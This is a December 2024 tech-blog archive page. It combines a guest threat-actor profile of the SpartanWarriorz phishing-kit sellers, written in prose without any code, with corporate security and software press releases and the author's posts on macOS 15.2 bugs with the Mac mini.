Archive for December, 2024

« Older Entries
Newer Entries »

Guest Post: Threat Actor Profile/Phish Kit Analysis By Fortra

Posted in Commentary with tags on December 13, 2024 by itnerd

SpartanWarriorz

Threat Background & History

Fortra is tracking activity from a scam kit authoring group known as SpartanWarriorz. These authors have been selling kits targeting over 300 global brands as far back as September 2022. They have targeted industries including financial institutions in North America and Europe, retail, delivery services, and social media platforms. Using the messaging service Telegram, they have been observed giving away a plethora of free phishing kits to increase their reputation within the phishing community. 

Operations experienced some service disruption recently when the SpartanWarriorz Telegram channel was shut down on November 21st. The group created a new channel on the same day and has attempted to inform their past subscribers.

Profile picture for SpartanWarriorz on Telegram.

Service Breakdown

SpartanWarriorz primarily has used the platform Telegram to advertise their phishing kits. Their Telegram channel currently has over 5,300 subscribers, managed by two moderators. Across their platform they have offered services including:

  • Phishing Kits and Pages
  • Access to Compromised Websites
  • Published Phishing Lures
  • Email Spamming Services

Example phishing kit advertised by SpartanWarriorz on Telegram.

Customary advertising file within a SpartanWarriorz phish kit.

SpartanWarriorz has advertised over 300 kits on Telegram that are available for sale or have been given away. In addition to the kits offered, SpartanWarriorz advertises mailer tools that allow threat actors to send out phishing campaigns using pre-authored lure emails available from the seller. The group also offers access to web server shells through their Telegram platform. These shells have been installed on compromised servers and can be used to carry out phishing attacks. 

A Telegram post advertising a plethora of SpartanWarriorz phish kits.

SpartanWarriorz kits allow users to input a Telegram API token and chat ID to exfiltrate stolen credentials, including OTP codes. Additionally, kits include extensive antibot lists that block specific IP addresses and ranges, user agents, and known web crawlers from accessing the phishing pages within the kit. This code sends all blocked visitors to Google.com or a fake 404 error page. Other configuration settings frequently seen include options to require victims to sign in twice or complete a CAPTCHA.   

Leave a comment »

Red Canary Delivers Record Q3 Results

Posted in Commentary with tags on December 12, 2024 by itnerd

 Red Canary, a leader in managed detection and response (MDR), announced strong Q3 FY25 results, achieving positive operating margins for the first time in company history. These results were buoyed by strength in the enterprise customer segment, with the most recent quarter exceeding 50% growth year-over-year. As identity and cloud threats continue to rise, organizations in nearly every industry are turning to Red Canary for its world class detection and response capabilities across endpoint, identity, and cloud attack surfaces.

With advanced detection engineering, threat intelligence, threat hunting, and world-class support baked into the platform, Red Canary helps customers improve their security posture from day one, providing immediate time to value. Over the last year, growth has been driven by large organizations realizing the value of Red Canary’s expertise in detecting and responding to emerging threats across all domains with high quality, accuracy, and at an incredible scale.

Product innovations in Q3 FY25:

  • Continued to accelerate threat investigations and response times with GenAI agent flows, realizing over 60% faster mean time to investigate and enabling customers to address threats more swiftly and effectively with Red Canary flow investigations.
  • Cost-efficient storage that strengthens security posture with the release of Security Data Lake, delivering long-term log retention, search, and MDR enhancement capabilities. 
  • Expanded endpoint integrations with Trend Micro Vision One integration, providing customers an EDR solution with extensive telemetry, a comprehensive detection analytics library, automated remediation actions, and advanced threat hunting.
  • Delivered powerful AI-driven security operations with Managed XSIAMmaking Red Canary analytics and expert help available inside of Palo Alto Networks Cortex XSIAM with a new managed service—now in early access.

Key company milestones in Q3 FY25:

  • Achieved record-breaking third quarter, the best Q3 in the company’s history for new business bookings.
  • Appointed Todd Chronert as Chief Revenue Officera proven cybersecurity leader with nearly 20 years of experience, to drive global sales, business development, and partnerships while accelerating growth and strengthening Red Canary’s leadership in MDR.
  • Published a major midyear update to the 2024 Threat Detection Report, offering a comprehensive summary and analysis on the top trending threats and techniques in the first half of 2024 to help provide timely insights for organizations to stay ahead of emerging threats.
  • Released latest monthly threat intelligence research, highlighting browser-related threats, including ChromeLoader and SocGholish continue to have an impact and rank among top 10 threats.
  • Earned customer recognition with five badges in G2’s Fall 2024 report, including Fastest Implementation in MDR.

Leave a comment »

So My macOS 15.2 Issue With The TV Connected To My Mac mini Showing As Being Mirrored Is A “Feature”

Posted in Commentary with tags on December 12, 2024 by itnerd

Earlier today I posted a story about my Mac mini thinking that the Screen is being mirrored when it actually wasn’t. I did a lot of research and I think I found my answer here. This is the key bit:

In the current version of macOS, Apple allows for mirroring a Mac’s display to an ‌Apple TV‌, but there is no option for sharing just a portion of a display.

The menu allowing for an entire screen or just a window or app to be displayed also appears when connecting a Mac to a TV over HDMI.

That last sentence is the one that fits what I am seeing and confirms that this is a “feature” and not a bug as this is a TV that my Mac mini is connected to and it is connected over HDMI. But having that purple icon always on my screen seems to me to be completely needless. Thus to stop my OCD from acting up, I’ve hidden the icon by doing this:

  • Go to System Settings
  • Go to Control Center
  • Set Screen Mirroring to Don’t Show In Menu Bar

It should look like this when you’re done:

I honestly wish Apple found some more elegant method of doing this. I say that because I am sure that the AppleCare helpline is being hit with calls regarding this, which is something that could have been avoided by a better UI design. But what do I know? After all Apple knows best right?

1 Comment »

AHEAD Launches Mid-Market Growth Unit to Empower Digital Transformation

Posted in Commentary with tags on December 12, 2024 by itnerd

AHEAD, a leading provider of enterprise cloud solutions, has announced the formation of a dedicated unit to serve the mid-market segment, defined generally as organizations with under 2,500 employees and less than $1 billion in annual revenues. This new AHEAD unit will include a dedicated sales team and solutions engineering support model tailored to the specific needs of mid-market organizations.

With over 2,000 clients already in this segment, AHEAD sees potential for 30% annual growth from both expansion of existing client relationships and acquiring new accounts.  Further, the segment is a key priority of AHEAD’s largest partner, Dell Technologies, whose solutions will be a major point of emphasis in serving the segment.

Sales veteran Mike Kuehn will oversee the mid-market team as Senior Vice President, reporting to Tim Frank, AHEAD’s Chief Revenue Officer. Based in New Jersey, Mike brings 30 years of experience in B2B technology, and a track record of building high-growth software and services companies. In addition to his responsibilities for the mid-market, Kuehn will also lead AHEAD Sales University (ASU), the company’s sales professional development program designed to create the next generation of seasoned account executives. 

Leave a comment »

Lloyd’s of London Launches First-of-its-kind Consortium Built on HITRUST Certification to Shape the Future of Cyber Insurance  

Posted in Commentary with tags on December 12, 2024 by itnerd

HITRUST, the leader in information security assurances for risk and compliance management, today unveiled an innovative cyber insurance consortium in collaboration with Lloyd’s of London and backed by a network of globally recognized AA-rated insurers. This first-of-its-kind shared risk facility revolutionizes the cyber insurance landscape, delivering exclusive, market-leading coverage and rates to HITRUST-certified organizations worldwide. By aligning relevant and reliable cybersecurity practices with tailored insurance solutions, the consortium sets a new standard for incentivizing and protecting trusted organizations.

As cyber threats continue to escalate, organizations face increasing pressure to effectively measure and mitigate information risk. HITRUST’s proven methodology, stands out as the industry-leading solution to manage information risk and to measure residual risk. By incorporating relevant risk management practices and security controls with a comprehensive and reliable assurance process, HITRUST-certified organizations achieve a significantly lower likelihood of breaches with the gold standard for resilience in an increasingly volatile threat landscape and endorsement by leading cyber insurers.

According to the recently published 2024 Trust Reportless than 1% of HITRUST-certifications experienced a breach over the past two years. This remarkable statistic underscores the effectiveness of the HITRUST assurance program in delivering measurable risk mitigation outcomes.

The newly formed consortium with Lloyd’s of London unites additional capital from a global network of Moody’s recognized AA-rated insurers to establish an innovative shared risk facility. This novel initiative leverages the proven link between HITRUST certification and superior and measurable risk management, enabling insurers to confidently deliver enhanced and more consistent insurance products. The facility is designed to scale as additional insurers join, ensuring greater capacity to meet the evolving demands of HITRUST-certified organizations across the globe.

Key benefits for HITRUST-certified organizations include:

  • Lower Insurance Costs: Exclusive, market-leading rates with more favorable terms and significant savings that reflect an organization’s commitment to strong cybersecurity practices, including a starting credit of 25% on premiums.  
  • Simplified Insurance Process: Redundant questionnaires and lengthy application cycles are replaced with streamlined underwriting based on data from the HITRUST certification; some policies being underwritten in just one week.
  • Comprehensive Coverage: Policies are built on a single-page exclusion model, offering clarity and adaptability while supporting a wide range of organizational needs.
  • Scalable Protection: Access to increasing capacity as the consortium grows, ensuring coverage is adaptable to an organization’s needs as they change and grow over time.
  • Recognition for Security Investments: Demonstrate to partners, clients, and regulators that your organization meets the highest standards of cybersecurity, validated by the industry’s most trusted risk management framework.

To enable this consortium, HITRUST has developed a secure API that allows insurers to access detailed information about an organization’s HITRUST r2 certification through the company’s Results Distribution System (RDS). This technology ensures that insurers receive structured, consistent assessment data, facilitating a more accurate and efficient underwriting process.

Understanding the Shared Risk Facility  

A shared risk facility is a collaborative arrangement where multiple insurers come together to share the underwriting risk associated with policies. For HITRUST-certified organizations, this means access to better insurance options, as the insurers collectively recognize the reduced risk these organizations present. This collaboration fosters a more stable and competitive insurance market.

Availability and Next Steps

The enhanced cyber insurance offerings are available to HITRUST-certified organizations effective immediately through their existing brokers. Currently available for HITRUST r2 certifications, plans are underway to extend this capability to include the i1 and e1 assurance programs in 2025. Additionally, there is potential to expand the scope to encompass HITRUST’s newly released AI Security Certification offering.

Organizations interested in benefiting from improved coverage and rates are encouraged to pursue HITRUST certification to take advantage of these new options.

For more information about how to get started with HITRUST certification, please visit hitrustalliance.net/cyber-insurance or contact them.

Leave a comment »

macOS 15.2 Is Making My Mac mini Think That The Screen Is Being Mirrored… Why?

Posted in Commentary with tags on December 12, 2024 by itnerd

Adding to Time Machine issues, and display issues which appear to be a design choice that Apple didn’t tell anyone about, along with “Hey Siri” Functionality On The Mac Mini Apparently Not Working comes a new issue that appeared when I installed macOS 15.2 which dropped yesterday. After the install of that update, my Mac mini which is plugged into a TV now shows this:

The purple icon on the left indicate that my screen is being shared. Further confirmed by this:

But the thing is that I am not mirroring the screen. The Mac mini is only plugged into a TV via HDMI. There are no secondary monitors in play here as confirmed by this:

Pressing “Stop Extending” doesn’t do anything. I am not running any third party software to do anything with monitors. My only thought is that the Mac mini is seeing this display as a TV, which it is, and for reasons that I do not understand is offering to extend to this TV even though it is the only display connected.

Now I initially thought it was just me. But it turns out that there’s a Reddit post that has other people with the same issue. That implies a bug unless there is evidence that says otherwise. Thus I will continue to research this and post any new findings that I come across here in the form of updates. But I wanted to put this out there in case that you had the same issue. Also, if you know what this is and why it’s happening, along with any fixes if this is a bug, I’d love to hear from you as well.

I swear, macOS Sequoia is not a good release at all. Apple may have been better off letting it bake in the oven a bit longer before releasing it to the public.

2 Comments »

Zoho Introduces a Suite of New Features to Help Canadian Businesses Unlock Greater Efficiency in Their Finance and Operations

Posted in Commentary with tags on December 12, 2024 by itnerd

Zoho today announced the addition of key capabilities in Zoho Books, Zoho Inventory, and Zoho Practice, helping Canadian businesses and accountants enhance operational efficiency, simplify routine financial tasks, and ensure regulatory compliance. These capabilities aim to support organizations in streamlining many of their internal processes by providing them with necessary tools that help them grow. 

Many businesses rely on manual processes for performing critical financial tasks, resulting in delays, errors, and inefficiencies that drive up costs and hinder growth. Today’s updates to Zoho’s finance and operations platform aim to streamline these processes for greater efficiency for both businesses and accountants.

For businesses:

Zoho Books has introduced a suite of new features, including support for electronic filing of T4A and T5018 slips with Canada Revenue Agency. Businesses from Quebec can generate combined GST/HST-QST returns that include both federal and provincial returns that can be easily filed online with the Revenu Quebec. Progress-based invoicing allows businesses to invoice customers for the duration of a project incrementally, improving cash flow. With bill pay capabilities, businesses can autoscan, 3-way match for accuracy, and pay multiple bills from different vendors, simplifying the entire accounts payable process. Advanced features like revenue recognition automatically recognize revenue based on contractual obligations or when the service is delivered, while the fixed asset management feature allows recording of asset details, automatic depreciation calculations, and generate forecast reports, simplifying the bookkeeping process.

In Zoho Inventory, advanced warehouse management capabilities—such as enhanced location tracking and labeling, stock counting, stock out alerts, and role-based access to the warehouse operations—offer better inventory control, ensure accurate stock levels, and provide faster order processing. The product’s mobile apps empower warehouse employees to perform their tasks more efficiently, improving productivity.

For accountants:

Zoho Practice has included new features to help accountants deliver client services efficiently. Workpapers simplifies audit and compliance workflows by automatically fetching client financial statements from Zoho Books, enabling easy comparison, adjustments, document management, and collaboration for seamless review and approval. The self-service portal enables accountants to collaborate with clients that use third-party services, facilitating document requests, digital signatures, and communication. Accountants can easily create and manage ledgers without a full accounting system, helping them maintain a single source truth. Advanced capabilities like workflow automation, custom functions, and scheduling options support a complete tailoring of their operational workflow.

Pricing and Availability

All the features announced today for Zoho Books, Zoho Inventory, and Zoho Practice are available for immediate use. For more details on pricing, please visit the following pages for each product: Zoho BooksZoho InventoryZoho Practice.

Leave a comment »

Free Wi-Fi Pilot Project Launches in Two Ottawa Community Housing Buildings

Posted in Commentary with tags on December 12, 2024 by itnerd

Ottawa Community Housing (OCH) is excited to announce that a free community Wi-Fi pilot has officially launched at two of its buildings in Vanier. Known as CommuniFi, the project is managed by National Capital FreeNet (NCF) in partnership with OCH, Hiboo Networks and with funding and technical support from CIRA (Canadian Internet Registration Authority).

The CommuniFi project helps bridge the digital divide for tenants at 251 and 255 Donald Street by providing free Wi-Fi in the common areas of the buildings. For many low-income households, the high cost of home internet and cellphone data creates barriers to accessing essential resources like education, employment opportunities, health services and connection to friends and family. This initiative is designed to alleviate some of the financial pressures associated to network connection and empower tenants to better navigate the digital world. 

The introduction of free Wi-Fi transforms the common areas of the buildings into a hub for learning, support and social engagement. It creates opportunities to host essential onsite support programs, social activities and community events. Community partners can also leverage the free Wi-Fi to deliver events, programs and workshops, providing tenants with access to a variety of resources and opportunities within their buildings. 

Recognizing that digital access also requires digital skills, NCF’s award-winning HelpDesk will host tailored workshops and information sessions to assist tenants in using the free Wi-Fi network. The workshops aim to equip tenants with the knowledge to fully benefit from the opportunities that the connectivity provides. 

OCH is proud to play a key role in expanding digital access beyond these buildings. By hosting the necessary infrastructure, OCH is enabling NCF to extend the pilot project to at least 10 other community organizations in the coming year, strengthening digital inclusion and building more connected communities. 

Leave a comment »

Bell and Palo Alto Networks Form Strategic Partnership 

Posted in Commentary with tags , on December 12, 2024 by itnerd

Bell Canada, Canada’s largest communications company, and Palo Alto Networks, the global cybersecurity leader, announced today a strategic partnership that brings together Bell’s expertise in Managed and Professional services with Palo Alto Networks industry-leading, AI-powered cybersecurity platforms. Building upon customer success and service development initiatives launched in 2023, Bell will now offer a full suite of services across Palo Alto Networks three platforms, delivering comprehensive protection against evolving cyber threats for customers in Canada.

Palo Alto Networks platformization approach unifies diverse security solutions into scalable platforms across network, cloud, and security operations. These platforms leverage automation and AI to deliver robust protection against cyber threats. Bell’s deep bench of Managed and Professional Services experts, combined with Palo Alto Networks platforms enables 24/7 protection and secure connectivity through dedicated threat alerts and mitigation to stop and prevent malicious attacks. Businesses are empowered to achieve a unified security posture, enhance threat prevention, optimize operational efficiency, and accelerate digital transformation initiatives.

Bell’s Managed Services team will support the following Palo Alto Networks solutions:

  • Prisma Access – The industry’s only security services edge (SSE) solution offering the most cutting-edge Zero Trust Network Access, (ZTNA 2.0), to protect the future of work with an easy-to-use, unified security product. Prisma Access delivers industry-leading security to dramatically reduce the risk of a data breach while offering an exceptional user experience.
  • Palo Alto Networks NGFW – The first Next-Generation Firewalls with real-time inline security that help stop the most complex threats with AI-powered, cloud-based network security.
  • Prisma Cloud (CNAPP) – The Code to Cloud platform powered by Precision AI secures cloud-native applications and infrastructure, accelerating cloud adoption and helping to ensure security policy compliance.
  • Cortex XSIAM – The leading AI-powered SOC platform that centralizes data and SOC capabilities — XDR, SOAR, ASM, SIEM to streamline security operations and accelerate      and automate incident response and remediation.

The partnership underscores Bell’s objective to provide innovative and comprehensive security solutions to businesses across Canada. Earlier this year, Bell announced the acquisition of Stratejm, leading provider of Security-as-a-Service and enhanced Managed Detection and Response services. The expanded partnership with Palo Alto Networks further augments Bell’s cybersecurity capabilities and is another step toward becoming the largest and most trusted Managed Security Services Provider in Canada.

Leave a comment »

Why Is “Hey Siri” Functionality On The Mac Mini Apparently Not Working?

Posted in Commentary with tags on December 12, 2024 by itnerd

A reader of this blog pointed me towards a Reddit thread and a MacRumors thread where people are complaining about this:

Given that Apple Intelligence and a better Siri experience are part and parcel of macOS Sequoia, and the Mac mini is Apple’s gateway into getting more Macs into the hands of more people, this is really bad.

Another data point. The same reader who tipped me off to this has confirmed that on his M4 Mac mini, when Apple Intelligence is on, he has to click on the Siri/Apple Intelligence button, then the mic icon, and then he can talk to Siri.  If Apple Intelligence is off, he clicks Siri and he can talk right away. That implies bug to me.

What I am guessing is that Apple only likely tested this on the Studio Display and figured that it was job done at that point. I say that because some people with Mac mini’s and Studio Displays have confirmed that this is working as intended. Clearly Apple needs to do better QA before releasing stuff to their customers. The bottom line is that you can add this to the growing list of bugs with macOS Sequoia which includes Time Machine issues, and display issues which appear to be a design choice that Apple didn’t tell anyone about.

Apple really has lost the plot when it comes to software quality.

Leave a comment »

« Older Entries
Newer Entries »